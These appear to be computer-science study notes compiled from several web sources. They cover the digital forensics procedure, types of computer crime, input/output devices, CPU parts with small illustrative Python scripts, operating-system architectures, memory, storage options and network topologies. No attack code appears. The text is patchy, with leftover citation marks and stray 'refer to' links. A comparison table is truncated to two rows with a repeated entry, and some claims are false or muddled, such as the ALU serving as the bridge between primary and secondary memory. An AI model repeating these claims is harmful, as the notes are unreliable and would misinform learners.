Unit I
PROCEDURE:
The procedure starts with identifying the devices involved and collecting the preliminary evidence at the crime scene. A court warrant is then obtained for the seizure of the evidence, and the evidence is seized accordingly. The evidence is then transported to the forensics lab for further investigation; the documented process of moving the evidence from the crime scene to the lab is called the chain of custody. The evidence is then copied for analysis and the original is kept safe, because analysis is always done on the copied evidence and never on the original.
The copied evidence is then analysed for suspicious activity and, accordingly, the findings are documented in a non-technical tone. The documented findings are then presented in a court of law for further proceedings.
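Because analysis must be performed on a copy while the original is preserved, investigators verify that the working copy is bit-for-bit identical to the original, typically by comparing cryptographic hashes. A minimal Python sketch of that check (the file names are hypothetical):

import hashlib

def sha256_of(path, chunk_size=1 << 20):
    """Return the SHA-256 digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

# Hypothetical image files: the seized original and the working copy.
original = sha256_of("evidence_original.img")
working = sha256_of("evidence_copy.img")

# The copy is only fit for analysis if its hash matches the original's.
assert original == working, "Working copy does not match the original!"
print("Verified: analysis copy matches seized evidence", original)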
Some Tools used for Investigation:
Tools for Laptop or PC –
COFEE (Computer Online Forensic Evidence Extractor) – A suite of tools for Windows developed by Microsoft.
The Coroner’s Toolkit – A suite of programs for Unix analysis.
The Sleuth Kit – A library of tools for both Unix and Windows.
Tools for Memory :
Volatility
WindowsSCOPE
Tools for Mobile Device :
MicroSystemation XRY/XACT
The digital forensic process comprises five phases:
Identification
Preservation
Analysis
Documentation
Presentation
Identification
It is the first step in the forensic process. The identification process mainly establishes what evidence is present, where it is stored, and how it is stored (in which format). Electronic storage media can be personal computers, mobile phones, PDAs, etc.
Preservation
In this phase, data is isolated, secured, and preserved. It
includes preventing people from using the digital device so that
digital evidence is not tampered with.
Analysis
In this step, investigation agents reconstruct fragments of data
and draw conclusions based on evidence found. However, it
might take numerous iterations of examination to support a
specific crime theory.
Documentation
In this process, a record of all the visible data must be created. It helps in recreating the crime scene and reviewing it. It involves proper documentation of the crime scene along with photographing, sketching, and crime-scene mapping.
Presentation
In this last step, the process of summarization and explanation of
conclusions is done.
However, it should be written in layperson's terms using abstracted terminology, and all abstracted terms should reference the specific underlying details.
COMPUTER CRIMES
The growth and advances in digital technology create a whole new platform for criminal activity. Since the advancement of technology, any crime that involves using a computer or network is generally referred to as a cybercrime or computer crime. The penalties differ for each crime, depending on whether it violated state or federal laws. In general, they include fines, imprisonment, probation, or all of the above.
Hacking
The computer crime hacking refers to the practice of gaining unauthorized
access to another person’s computer, database, or network where private
information can be stored. It is a felony in the U.S. to hack a computer system,
whether it is a single personal computer or an organizational computer network.
However, not all types of “hacking” refer to crimes. Some organizations perform
“Ethical hacking” on their own systems or with permission to explore the systems
of others to look for vulnerabilities. This is treated differently than “malicious
hacking,” the act of entering someone’s computer without their knowledge to take
data or leave viruses.
Piracy
Piracy is a computer crime that occurs when a person distributes copyrighted
material without gaining permission from the original owner. The shared material
can be different types of media, including music, software, movies, images, and
books. There are many sharing websites that practice internet piracy by offering
free, downloadable versions of products. In many jurisdictions, it is only the
sharing of materials that is illegal, and being in receipt may not be illegal.
However, many peer-to-peer (p2p) systems require users to share material with
others as it is being downloaded, resulting in a form of collaborative piracy. The
charges for piracy differ from case to case, so it is important to contact an attorney to ensure that you are correctly informed about the laws regarding your specific situation.
Cyber Stalking/Harassment
The victim of cyber stalking is subjected to an excessive number of online
messages, whether through social media, web forums, or email. It is common for
the perpetrator to have real world contact with the victim but use the internet to
stalk them instead of stalking them in the physical sense. It could progress into traditional stalking if the perpetrator feels they need to make more of an impact on their victim's life.
Identity theft
Identity theft in the world of computer crimes involves a form of hacking where
the perpetrator accesses the victim’s sensitive information such as their Social
Security Number (SSN), bank account information, or credit card numbers. They
then use this information to spend their victim’s money for online shopping or
simply to steal the money through fraudulent transfers.
Child Pornography/Abuse
This cybercrime can involve the perpetrator looking to create or distribute sexual
images of children. In some cases, the accused seeks out minors on the internet,
whether that be via social media or chatrooms with the objective of producing
child pornography. The government monitors a large number of chat rooms in hopes of reducing and preventing this type of exploitation, and it also maintains
databases of existing child pornographic content that may be shared. Convictions
for these charges typically mean long prison sentences. It is important to contact
an attorney in the case of any accusations of these crimes because the
punishments are so severe.
Unit II
Keyboard
The keyboard is the most frequent and widely used input device for entering
data into a computer. Although there are some additional keys for performing
other operations, the keyboard layout is similar to that of a typical typewriter.
Generally, keyboards come in two sizes, 84 keys or 101/102 keys, but keyboards with 104 or 108 keys are now also available for Windows and the Internet.
Types of Keys
Numeric Keys: These are used to enter numeric data or move the cursor. They usually consist of a set of 17 keys.
Typing Keys: The letter keys (A-Z) and number keys (0-9) are among these keys.
Control Keys: These keys control the pointer and the screen. They include four directional arrow keys as well as Home, End, Insert, Delete, Alternate (Alt), Control (Ctrl), and Escape (Esc).
Special Keys: Enter, Shift, Caps Lock, Num Lock (NumLk), Tab, Print Screen, etc. are among the special keys on the keyboard.
Function Keys: The 12 keys from F1 to F12 are on the topmost row of the
keyboard.
Mouse
The most common pointing device is the mouse. The mouse is used to move a
little cursor across the screen while clicking and dragging. The cursor will stop if
you let go of the mouse. The computer is dependent on you to move the
mouse; it won’t move by itself. As a result, it’s an input device.
A mouse is an input device that lets you move the mouse on a flat surface to
control the coordinates and movement of the on-screen cursor/pointer.
The left mouse button can be used to select or move items, while the right
mouse button when clicked displays extra menus.
Joystick
The joystick’s function is comparable to that of a mouse. It is primarily used in
CAD (Computer-Aided Design) and playing video games on the computer.
Track Ball
Track Ball is an accessory for notebooks and laptops, which works on behalf of
a mouse. It has a similar structure to a mouse. Its structure is like a half-
inserted ball, and we use our fingers for cursor movement. The device comes in different shapes, such as a ball, a button, or a square.
Light Pen
A light pen is a type of pointing device that looks like a pen. It can be used to
select a menu item or to draw on the monitor screen. A photocell and an optical
system are enclosed in a tiny tube. When the tip of a light pen is moved across
a monitor screen while the pen button is pushed, the photocell sensor element
identifies the screen location and provides a signal to the CPU.
Scanner
A scanner is an input device that functions similarly to a photocopier. It’s
employed when there’s information on paper that needs to be transferred to the
computer’s hard disc for subsequent manipulation. The scanner collects images
from the source and converts them to a digital format that may be saved on a
disc. Before they are printed, these images can be modified.
MICR (Magnetic Ink Character Recognition) Reader
It is a device that is generally used in banks to deal with the cheques given to
the bank by the customer. It helps in reading the magnetic ink present in the
code number and cheque number. This process is very fast compared to any
other process.
Bar Code Reader
A bar code reader is a device that reads data that is bar-coded (data represented by light and dark lines). Bar-coded data is commonly used to mark things, number books, and so on. It could be a handheld scanner or part of a
stationary scanner. A bar code reader scans a bar code image, converts it to an
alphanumeric value, and then sends it to the computer to which it is connected.
Web Camera
Because a web camera records a video image of the scene in front of it, a
webcam is an input device. It is either built inside the computer (for example, a
laptop) or attached through a USB connection. A webcam is a computer-
connected tiny digital video camera. It’s also known as a web camera because
it can take images and record video. These cameras come with software that
must be installed on the computer in order to broadcast video in real-time over
the Internet. It can shoot images and HD video; however, the video quality isn't as good as that of other cameras (in mobile phones, other devices, or dedicated cameras).
Digitizer
A digitizer (graphics tablet) is an input device that converts analog information, such as drawings traced with a stylus on its flat surface, into a digital form the computer can process.
Microphone
The microphone is an input device that receives voice signals and converts them to digital form. It is a very common device, present in every device that is related to music.
Output Devices
Output devices are the devices that show us the result after input is given to a computer system. Output can take many different forms, like images, graphics, audio, video, etc. Some of the output devices are described below.
Monitor
Monitors, also known as Visual Display Units (VDUs) , are a computer’s primary
output device. It creates images by arranging small dots, known as pixels, in a
rectangular pattern. The number of pixels determines the image's sharpness.
The two kinds of viewing screens used for monitors are described below.
Cathode-Ray Tube (CRT) Monitor: Pixels are minuscule visual elements
that make up a CRT display. The higher the image quality or resolution, the
smaller the pixels.
Flat-Panel Display Monitor: In comparison to the CRT, a flat-panel
display is a type of video display with less volume, weight, and power
consumption. They can be hung on the wall or worn on the wrist.
Flat-panel displays are currently used in calculators, video games, monitors,
laptop computers, and graphical displays.
Television
Television is one of the common output devices, present in almost every house. It portrays video and audio files on the screen as the user operates the television. Nowadays, we use plasma and other flat-panel displays instead of the CRT screens used earlier.
Printer
Printers are output devices that allow you to print information on paper. There
are certain types of printers which are described below.
Impact Printers
Character Printers
Line Printers
Non-Impact Printers
Laser Printers
Inkjet Printers
Impact Printer
In impact printers, characters are formed by striking an inked ribbon against the paper. The following are the characteristics of impact printers:
Exceptionally low consumable cost.
Quite noisy
Because of its low cost, it is ideal for large-scale printing.
To create an image, there is physical contact with the paper.
Character Printers
Character Printer has the capability to print only one character at a time. It is of
two types.
Dot Matrix Printer
Daisy Wheel
Line Printers
Line Printers are printers that have the capability to print one line at a time. It is
of two types.
Drum Printer
Chain Printer
Non-Impact Printers
Characters are printed without the need for a ribbon in non-impact printers.
Because these printers print a full page at a time, they’re also known as Page
Printers. The following are the characteristics of non-impact printers:
Faster
They don’t make a lot of noise.
Excellent quality
Supports a variety of typefaces and character sizes
Laser Printers
Laser printers use laser light to produce the dots that form characters on the page.
Inkjet Printers
Inkjet printers are printers that use spray technology for printing on paper. Inkjet printers produce high-quality output and can also print in color.
Speakers
Speakers are devices that produce sound after getting a command from a computer. Nowadays, speakers also come with wireless technology, such as Bluetooth speakers.
Projector
Projectors are optical devices that project visuals, both still and moving, onto a screen. They help in displaying images on a big screen and are generally used in theatres, auditoriums, etc.
Plotter
A plotter is a device that helps in producing graphics or other drawings with a realistic, exact appearance. A graphics card is required to use these devices. Plotters use pen-like devices to generate exact designs from the computer.
Braille Reader
A Braille reader is a very important device used by blind users. It helps people with low or no vision to recognize data by running their fingers over the device. It is a very important device for blind persons, as it gives them the comfort of reading letters and words, which helps them in their studies.
Video Card
A video card is a device that is fitted into the motherboard of the computer. It improves how digital content appears on output devices and can drive multiple display devices.
Headphones
Headphones are just like speakers, except that they are generally used by a single person and are not suited to large areas. Headphones with an attached microphone are also called headsets.
Both the Input and Output Devices of the Computer
There are many devices that have the characteristics of both input and output. They can perform both operations, as they receive data and provide results. Some of them are mentioned below.
USB Drive
USB Drive is one of the devices which perform both input and output operations
as a USB Drive helps in receiving data from a device and sending it to other
devices.
Modem
Modems are important devices that help in transmitting data over telephone lines.
CD and DVD
CDs and DVDs are common media that save data from one computer in a particular format and can carry that data to other devices, where they work as input devices for the computer.
Facsimile
A facsimile is a fax machine that consists of a scanner and printer, where the
scanner works as an input device and the printer works as an output device.
b) Discuss CPU
The CPU is responsible for all the major tasks like processing data and
instructions inside the computer system. But, all this is possible only because of
the components present inside the CPU which divide the work among
themselves and process it at a fast pace to produce the desired result. We will
study each of these components in the subsequent parts.
1. Control Unit (CU)
The control unit controls the way the input and output devices, the Arithmetic and Logic Unit, and the computer's memory respond to the instructions sent to the CPU. It fetches the input, converts it into a decoded form, and then sends it for processing to the computer's processor, where the desired operation is performed. There are two types of control units – the hardwired CU and the microprogrammable CU.
Functions of the Control Unit:
It controls the sequence in which instructions move in and out of the processor and also the
way the instructions are performed.
It is responsible for fetching the input, converting it into signals, and
storing it for further processing.
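As a toy illustration of the fetch-decode-execute cycle the control unit drives, here is a minimal Python sketch; the instruction set and program are invented purely for illustration:

# Toy fetch-decode-execute loop: the "control unit" steps through a
# program in memory, decodes each instruction, and dispatches it.
memory = [
    ("LOAD", 5),      # put 5 into the accumulator
    ("ADD", 3),       # add 3 to the accumulator
    ("PRINT", None),  # emit the accumulator
    ("HALT", None),
]

accumulator = 0
pc = 0                             # program counter
while True:
    opcode, operand = memory[pc]   # fetch
    pc += 1
    if opcode == "LOAD":           # decode + execute
        accumulator = operand
    elif opcode == "ADD":
        accumulator += operand
    elif opcode == "PRINT":
        print("result:", accumulator)
    elif opcode == "HALT":
        break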
2. Arithmetic Logic Unit (ALU)
The Arithmetic and Logical Unit is responsible for arithmetical and logical calculations as well as
taking decisions in the system. It is also known as the mathematical brain of the computer. The ALU
makes use of registers for the calculations. It takes input from input registers, performs operations on
the data, and stores the output in an output register.
Functions of ALU:
It is mainly used to make decisions like performing arithmetic and logical operations.
It acts as a bridge between the computer’s primary memory and the secondary memory. All
information that is exchanged between the primary and secondary memory passes through
the ALU.
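A minimal sketch of the ALU's role, modelled as a function that selects an arithmetic or logical operation by opcode (the opcode names are our own, chosen for illustration):

def alu(op, a, b):
    """A toy ALU: arithmetic and logical operations selected by opcode."""
    ops = {
        "ADD": lambda: a + b,
        "SUB": lambda: a - b,
        "AND": lambda: a & b,
        "OR":  lambda: a | b,
        "EQ":  lambda: int(a == b),  # a comparison used for decision-making
    }
    return ops[op]()

print(alu("ADD", 6, 7))  # 13
print(alu("AND", 6, 7))  # 6
print(alu("EQ", 6, 7))   # 0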
3. Registers
Registers are part of a computer’s memory that is used to store the instructions temporarily to
provide the processor with the instructions at times of need. These registers are also known as
Processor registers as they play an important role in the processing of data. These registers store data in the form of memory addresses; after the processing of the instruction at that memory address is completed, the register stores the memory address of the next instruction. There are various kinds of registers that perform different functions.
Functions of Registers:
They temporarily hold instructions, data, and memory addresses so that the processor can access them quickly during execution.
4. Cache Memory
The cache is a type of random access memory that temporarily stores small amounts of data and instructions which can be reused as and when required. It reduces the time needed to fetch instructions: instead of being fetched from RAM, they can be accessed directly from the cache in a fraction of the time.
Functions of Cache:
They reduce the amount of time needed to fetch and execute instructions.
They store data temporarily for later use.
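The reuse described above can be demonstrated with Python's built-in functools.lru_cache, which keeps a small in-memory cache in front of a slow lookup (the 0.1-second delay is a stand-in for a slower memory level; the function is hypothetical):

from functools import lru_cache
import time

@lru_cache(maxsize=128)          # a small cache in front of a slow lookup
def slow_lookup(key):
    time.sleep(0.1)              # stand-in for a slow fetch from RAM/disk
    return key * 2

slow_lookup(10)                  # miss: pays the 0.1 s cost
slow_lookup(10)                  # hit: answered from the cache instantly
print(slow_lookup.cache_info())  # hits=1, misses=1, currsize=1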
5. Buses
A bus is a link between the different components of the computer system and the processor. They are
used to send signals and data from the processor to different devices and vice versa. There are three types of buses – the address bus, which is used to send memory addresses from the processor to other components; the data bus, which is used to send actual data from the processor to the components; and the control bus, which is used to send control signals from the processor to other devices.
Functions of Bus:
Buses carry data, memory addresses, and control signals between the CPU and the other components of the system.
6. Clock
As the name suggests, the clock controls the timing and speed of the functions of different
components of the CPU. It sends out electrical signals which regulate the timing and speed of the
functions.
Functions of Clock:
It synchronizes the components of the CPU by sending out regular electrical pulses that pace the fetching and execution of instructions.
Digital media
Hard drives store information in binary form and so are considered a type of physical digital media.
Examples
Examples of digital media include software, digital images, digital video, video
games, web pages and websites, social media, digital data and databases, digital
audio such as MP3, electronic documents and electronic books. Digital media often
contrasts with print media, such as printed books, newspapers and magazines, and
other traditional or analog media, such as photographic film, audio tapes or video tapes.
Digital media has had a significantly broad and complex impact on society and culture.
Combined with the Internet and personal computing, digital media has
caused disruptive innovation in publishing, journalism, public relations, entertainment,
education, commerce and politics. Digital media has also posed new challenges
to copyright and intellectual property laws, fostering an open content movement in
which content creators voluntarily give up some or all of their legal rights to their work.
The ubiquity of digital media and its effects on society suggest that we are at the start of
a new era in industrial history, called the Information Age, perhaps leading to
a paperless society in which all media are produced and consumed on computers.[5]
However, challenges to a digital transition remain, including outdated copyright
laws, censorship, the digital divide, and the spectre of a digital dark age, in which older
media becomes inaccessible to new or upgraded information systems.[6] Digital media
has a significant, wide-ranging and complex impact on society and culture.[5]
1. System Software:
System software is a type of computer program that is designed to run a computer's hardware and application programs. It controls a computer's internal functioning, chiefly through an operating system, and also controls peripheral devices such as monitors, printers, and storage devices.
2. Operating System:
An operating system or OS is system software that manages computer
hardware, and software resources, and provides common services for computer
programs. All operating systems are system software. Every desktop computer,
tablet, and smartphone includes an operating system that provides basic
functionality for the device.
Difference between System Software and Operating System:

S.No.  System Software                           Operating System
5.     It loads into the main memory             It resides in the main memory all the
       whenever required.                        time while the system is on.
6.     It is loaded by the operating system.     It resides in the main memory all the
                                                 time while the system is on.
Overview
The operating system provides an environment for the users to execute computer programs. Operating systems come pre-installed on the computers you buy: personal computers have Windows, Linux, or macOS; mainframe computers have z/OS, z/VM, etc.; and mobile phones have operating systems such as Android and iOS. The architecture of an operating system consists of four major components – hardware, kernel, shell, and application – and we shall explore all of them in detail one by one.
Scope
In this article, we'll learn how the operating system acts as an intermediary for the users.
We'll go through the components of the operating system, including process management, memory management, security, error detection, and I/O management.
We'll also learn about the four architectures of operating systems: monolithic, layered, microkernel, and hybrid.
We'll learn how the hybrid architecture of operating systems includes all of the previously mentioned architectures.
Highlights:
The operating system handles all of the above tasks for the system as well as application software. The architecture of an operating system is basically the design of its software and hardware components. Depending upon the tasks or programs they need to run, users can use the operating system most suitable for those programs.
Before explaining various architectures of the operating systems, let's explore a few terms first
which are part of the operating system.
1) Application: The application represents the software that a user is running on an operating system; it can be either system or application software, e.g. Slack, the Sublime Text editor, etc.
2) Shell: The shell represents software that provides an interface for the user where it serves to launch or start some program for which the user gives instructions. It can be of two types, a command line or a graphical user interface, e.g. MS-DOS Shell, PowerShell, csh, ksh, etc.
3) Kernel: Kernel represents the most central and crucial part of the operating system where it is
used for resource management i.e. it provides necessary I/O, processor, and memory to the
application processes through inter-process communication mechanisms and system calls. Let's
understand the various types of architectures of the operating system.
Highlights:
Architectures of operating systems can be of four types – monolithic, layered, microkernel, and hybrid – where hybrid architecture is the combination of the other three. The four major types of operating system architectures are described below.
1) Monolithic Architecture
In monolithic architecture, each component of the operating system is contained in the kernel i.e.
it is working in kernel space, and the components of the operating system communicate with
each other using function
calls.
Examples of this type of architecture are OS/360, VMX, and LINUX.
Advantages:
1. The main advantage of having a monolithic architecture of the operating system is that it provides CPU scheduling, memory management, file management, and other functions through system calls.
2. In a single address space, the entire large process is running.
3. It is a single static binary file.
Disadvantages:
1. The main disadvantage is that all components are interdependent and when one of them fails
the entire system fails.
2. In case the user has to add a new service or functionality the entire operating system needs to
be changed.
2) Layered architecture
In Layered architecture, components with similar functionalities are grouped to form a layer and
in this way, total n+1 layers are constructed and counted from 0 to n where each layer has a
different set of functionalities and services. Example: Dijkstra's THE operating system; Windows XP and Linux also implement some level of layering.
1. Each layer can communicate with all of its lower layers but not with its upper layer i.e.
any ith layer can communicate with all layers from 0 to i-1 but not with the i+1th layer.
2. Each layer is designed in such a way that it will only need the functionalities which are present in
itself or the layers below it.
1) Hardware: This is the innermost layer of the layered architecture. It consists of the physical components of the system and provides the basic functionality on which all the layers above it are built.
2) CPU Scheduling: This layer is responsible for process scheduling; multiple queues are used for scheduling. Processes entering the system are kept in the job queue, while those that are ready to be executed are put into the ready queue. It manages which processes are to be kept in the CPU and which are to be kept out of the CPU.
3) Memory Management: This layer handles the aspect of memory management, i.e. moving processes from secondary to primary memory for execution and vice versa. There are memories like RAM and ROM. RAM is the memory where our processes run; they are moved to RAM for execution, and when they exit, they are removed from RAM.
4) Process Management: This layer is responsible for managing the various processes, i.e. assigning the CPU to those processes on a priority basis for their execution. Process management uses many scheduling algorithms for prioritizing processes for execution, such as Round-Robin, FCFS (First Come First Serve), and SJF (Shortest Job First); a minimal FCFS sketch follows this list of layers.
5) I/O Buffer: Buffering is the temporary storage of data and I/O Buffer means that the data
input is first buffered before storing it in the secondary memory. All I/O devices have buffers
attached to them for the temporary storage of the input data because it cannot be stored directly
in the secondary storage as the speed of the I/O devices is slow as compared to the processor.
6) User Programs: This is the application layer of the layered architecture of the operating system. It deals with all the application programs running, e.g. games, browsers, word processors, etc. It is the highest layer of the layered architecture.
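The Process Management layer above mentions FCFS scheduling; here is the promised minimal FCFS sketch in Python, with hypothetical process names and burst times:

from collections import deque

def fcfs(processes):
    """First Come First Serve: run processes in arrival order and
    report each one's waiting time. `processes` is a list of
    (name, burst_time) pairs."""
    ready_queue = deque(processes)
    clock = 0
    while ready_queue:
        name, burst = ready_queue.popleft()   # earliest arrival runs first
        print(f"{name}: waited {clock}, runs for {burst}")
        clock += burst

fcfs([("P1", 5), ("P2", 3), ("P3", 8)])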
Advantages:
1) The layered architecture of the operating system provides modularity, because each layer is programmed to perform its own tasks only.
2) Since the layered architecture has independent components, changing or updating one of them will not affect the other components or stop the entire operating system from working; hence it is easy to debug and update.
3) The user can access the services of the hardware layer but cannot access the hardware layer itself, because it is the innermost layer.
4) Each layer has its own functionalities and is concerned only with itself; the other layers are abstracted from it.
Disadvantages:
1. Layered architecture is complex in implementation because one layer may use the services of
the other layer and therefore, the layer using the services of another layer must be put below
the other one.
2. In a layered architecture, if one layer wants to communicate with another it has to send a
request which goes through all layers in between which increases response time causing
inefficiency in the system.
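Disadvantage 2 can be illustrated with a toy Python model in which a request from the top layer must hop through every intermediate layer before reaching its target (the layer names follow the list above; the hop counting is purely illustrative):

# Toy model of layered communication: each extra layer between the
# source and the target adds a hop, and hence latency.
layers = ["user programs", "I/O buffer", "process management",
          "memory management", "CPU scheduling", "hardware"]

def send_down(request, from_layer, to_layer):
    hops = 0
    for layer in layers[layers.index(from_layer):]:
        print(f"request '{request}' passing through: {layer}")
        hops += 1
        if layer == to_layer:
            break
    print(f"total hops: {hops}")

send_down("read block 42", "user programs", "hardware")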
3) Microkernel Architecture
In this architecture, the components like process management, networking, file system
interaction, and device management are executed outside the kernel while memory management
and synchronization are executed inside the kernel. The processes inside the kernel have
relatively high priority, the components possess high modularity hence even if one or more
components fail the operating system keeps on working.
Advantages:
1. Microkernel operating systems are modular and hence, disturbing one of the components will
not affect the other component.
2. The architecture is compact and isolated and hence relatively efficient.
3. New features can be added without recompilation.
Disadvantages:
1. Communication between components takes place via message passing between user space and kernel space, which adds overhead and can make a microkernel slower than a monolithic kernel.
4) Hybrid Architecture
Hybrid architecture as the name suggests consists of a hybrid of all the architectures explained so
far and hence it has properties of all of those architectures which makes it highly useful in
present-day operating systems.
1) Hardware abstraction layer: It is the interface between the kernel and hardware and is
present at the lowest level.
2) Microkernel Layer: This is the old microkernel that we know and it consists of CPU
scheduling, memory management, and inter-process communication.
3) Application Layer: It acts as an interface between the user and the microkernel. It contains
the functionalities like a file server, error detection, I/O device management, etc.
Example: Microsoft Windows NT kernel implements hybrid architecture of the operating
system.
Advantages:
1. Since it is a hybrid of other architectures it allows various architectures to provide their services
respectively.
2. It is easy to manage because it uses a layered approach.
3. The number of layers is comparatively small.
4. Security and protection are relatively improved.
Disadvantage:
1) The hybrid architecture of the operating system keeps certain services in the kernel space while moving less critical services to the user space.
Conclusion
We conclude that the operating system has various architectures with which we can describe
the functionality of various components.
The components of the operating system are process management, memory management, I/O
management, Error Detection, and controlling peripheral devices.
These architectures include monolithic, layered, microkernel, and hybrid architectures classified
on the basis of the structure of components.
Hybrid architecture is the most efficient and useful architecture as it implements the
functionalities of all other architectures.
Hybrid architecture is better in terms of security as well.
The hybrid architecture of operating systems as we know is a hybrid of other architectures like
monolithic, layered, and microkernel architectures of operating systems so it has the
functionalities of all of them. Since hybrid architecture contains all the functionalities of the monolithic, layered, and microkernel architectures, it is considered better than all of them.
2) What are the Key Differences Between Monolithic and Layered Architecture
of Operating Systems?
The key differences between the monolithic and layered architecture of the operating system are:
1. In the monolithic operating system the entire operating system functionalities operate in the
kernel space while in layered architecture there are several layers where each layer has a
specific set of functionalities.
2. In the monolithic operating system there are mainly three layers, while a layered operating system has multiple layers.
For more, refer to Difference Between System Software and Application Software
FAQs on Application Software
Question: What is the difference between an app and an application?
Answer:
Apps are generally used on mobile devices, whereas applications can be termed as software programs for doing a preferred task.
Question: Can Application Software run on its own?
Answer:
System Software has the capability to run on its own, whereas Application Software is dependent on the System Software.
For more, refer to the Difference Between System Software and Application Software.
Question: How do you choose the best Application Software?
Answer:
The best Application Software can be chosen based on the user's requirements; if it fulfils your requirements, then it is perfect for you.
Question: What is the difference between On-Premise and Hosted Application Software?
Answer:
On-Premise is basically a data server inside the organization, whereas a Hosted Application manages data externally.
4. Discuss Memory
Volatile Memory: This loses its data when power is switched off.
Memory Hierarchy
The total memory capacity of a computer can be visualized as a hierarchy of components. The memory hierarchy system consists of all storage devices contained in a computer system, from the slow auxiliary memory to the fast main memory and the smaller cache memory.
Main Memory
The memory unit that communicates directly with the CPU, auxiliary memory and cache memory is called main memory. It is the central storage unit of the computer system. It is a large and fast memory used to store data during computer operations. Main memory is made up of RAM and ROM, with RAM integrated circuit chips holding the major share.
Auxiliary Memory
Devices that provide backup storage are called auxiliary memory. For
example: Magnetic disks and tapes are commonly used auxiliary
devices. Other devices used as auxiliary memory are magnetic drums,
magnetic bubble memory and optical disks.
Cache Memory
The data or contents of the main memory that are used again and again by the CPU are stored in the cache memory so that the data can be accessed in a shorter time.
Whenever the CPU needs to access memory, it first checks the cache memory. If the data is not found in the cache, the CPU moves on to the main memory. It also transfers blocks of recent data into the cache and keeps deleting old data from the cache to accommodate the new.
Hit Ratio
The ratio of the number of hits to the total CPU references to memory
is called hit ratio.
Hit Ratio = Hit/(Hit + Miss)
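A small Python sketch of the formula, together with a toy reference string that counts hits and misses (the addresses and counts are hypothetical):

def hit_ratio(hits, misses):
    """Hit Ratio = Hit / (Hit + Miss)."""
    return hits / (hits + misses)

# Hypothetical counts: 950 references served by the cache, 50 by main memory.
print(hit_ratio(950, 50))                      # 0.95

# Counting hits and misses over a toy reference string:
cache = set()
hits = misses = 0
for addr in [1, 2, 1, 3, 2, 1, 4, 1]:          # hypothetical address trace
    if addr in cache:
        hits += 1
    else:
        misses += 1
        cache.add(addr)                        # bring the block into the cache
print(hits, misses, hit_ratio(hits, misses))   # 4 4 0.5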
Associative Memory
Associative memory (content-addressable memory) is accessed by the content of the stored data rather than by a memory address; all stored words are compared with the search key in parallel.
Data Storage Options
The variety of data formats, record types, and volumes has served as a springboard for different approaches to storing data. From personal data storage devices to limitless data center and cloud-based repositories, you now have many options to organize and store your corporate data.
Direct-attached storage (DAS) stands for all types of physical data storage devices you can connect to a computer. Portable and affordable, yet accessible by only one computer at a time, DAS is a standard solution for keeping small-scale data backups or for transferring data between devices.
Storage area networks (SANs) help assemble an even more complex on-
premises data management architecture that features two components:
A dedicated network for data exchanges with network switches for load
balancing
Data storage system, consisting of on-premises hardware
The purpose of SAN is to act as a separate "highway" for transmitting data
between servers and storage devices across the organization, in a bypass of
local area networks (LANs) and wide-area networks (WANs). Featuring a
management layer, SANs can be configured to speed up and strengthen
server-to-server, storage-to-server and storage-to-storage connections.
For instance, you can set up a dedicated low-latency data exchange lane
between a server running big data analytics workloads and a storage system
(i.e., data warehouse) hosting the processed data. Doing so helps prevent
bottlenecks and delays for other users on the LANs/WANs. The type of data
storage that makes use of a dedicated SANs is typically defined as "block
storage."
Unlike other options, cloud data storage assumes you will (primarily) use
offsite storage of data in public, private, hybrid or multicloud environments that
are managed and maintained by cloud services providers such as Amazon,
Microsoft and Google, among others.
Unlike NAS (network-attached storage) or SAN, public cloud data storage doesn't require a separate internal network – all data is accessible via the internet. Also, there are
virtually no limits on scalability since you are renting storage resources from a
third party that effectively offers an endless supply of servers.
But while cloud data storage assumes only operational expenses (OpEx),
these too can add up without proper monitoring and optimization.
As with all the data storage options available, this approach works perfectly in
some applications and presents drawbacks in others.
5. Network
a) Discuss Topology
In a computer network, there are various ways in which different components are connected to one another. Network topology defines the structure of the network and how these components are connected to each other.
Types of Network Topology
The arrangement of a network that comprises nodes and connecting lines via sender and
receiver is referred to as Network Topology. The various network topologies are:
Point to Point Topology
Mesh Topology
Star Topology
Bus Topology
Ring Topology
Tree Topology
Hybrid Topology
Mesh Topology
In a mesh topology, every device is connected to another device via a particular channel.
In Mesh Topology, the protocols used are AHCP (Ad Hoc Configuration Protocols),
DHCP (Dynamic Host Configuration Protocol), etc.
Mesh Topology
Figure 1: Every device is connected to another via dedicated channels. These channels
are known as links.
Suppose N devices are connected with each other in a mesh topology; then the number of ports required by each device is N-1. In Figure 1, there are 5 devices connected to each other, hence the number of ports required by each device is 4. The total number of ports required = N * (N-1).
Suppose N devices are connected with each other in a mesh topology; then the total number of dedicated links required to connect them is C(N,2), i.e. N(N-1)/2. In Figure 1, there are 5 devices connected to each other, hence the total number of links required is 5*4/2 = 10.
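The two formulas above can be checked with a short Python sketch (a minimal illustration; the function name is ours):

def mesh_requirements(n):
    # Each of the n devices needs a dedicated port to every other device.
    ports_per_device = n - 1
    total_ports = n * (n - 1)         # N * (N-1)
    total_links = n * (n - 1) // 2    # C(N,2) = N(N-1)/2
    return ports_per_device, total_ports, total_links

print(mesh_requirements(5))           # (4, 20, 10), matching Figure 1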
Advantages of Mesh Topology
Communication is very fast between the nodes.
Mesh Topology is robust.
The fault is diagnosed easily. Data is reliable because data is transferred among the
devices through dedicated channels or links.
Provides security and privacy.
Drawbacks of Mesh Topology
Installation and configuration are difficult.
The cost of cables is high as bulk wiring is required, so it is suitable only for a small number of devices.
The cost of maintenance is high.
A common example of mesh topology is the internet backbone, where various internet
service providers are connected to each other via dedicated channels. This topology is
also used in military communication systems and aircraft navigation systems.
For more, refer to the Advantages and Disadvantages of Mesh Topology.
Star Topology
In Star Topology, all the devices are connected to a single hub through a cable. This hub
is the central node, and all other nodes are connected to the central node. The hub can be passive in nature, i.e. not an intelligent hub (a simple broadcasting device), or it can be intelligent, known as an active hub. Active hubs have repeaters in them. Coaxial cables or RJ-45 cables are used to connect the computers. In Star Topology, popular Ethernet LAN protocols such as CSMA/CD (Carrier Sense Multiple Access with Collision Detection) are used.
Star Topology
Figure 2: A star topology having four systems connected to a single point of connection
i.e. hub.
Advantages of Star Topology
If N devices are connected to each other in a star topology, then the number of cables
required to connect them is N. So, it is easy to set up.
Each device requires only 1 port i.e. to connect to the hub, therefore the total number
of ports required is N.
It is robust: if one link fails, only that link is affected and the rest of the network keeps working.
Fault identification and fault isolation are easy.
Star topology is cost-effective as it uses inexpensive coaxial cable.
Drawbacks of Star Topology
If the concentrator (hub) on which the whole topology relies fails, the whole system
will crash down.
The cost of installation is high.
Performance is based on the single concentrator i.e. hub.
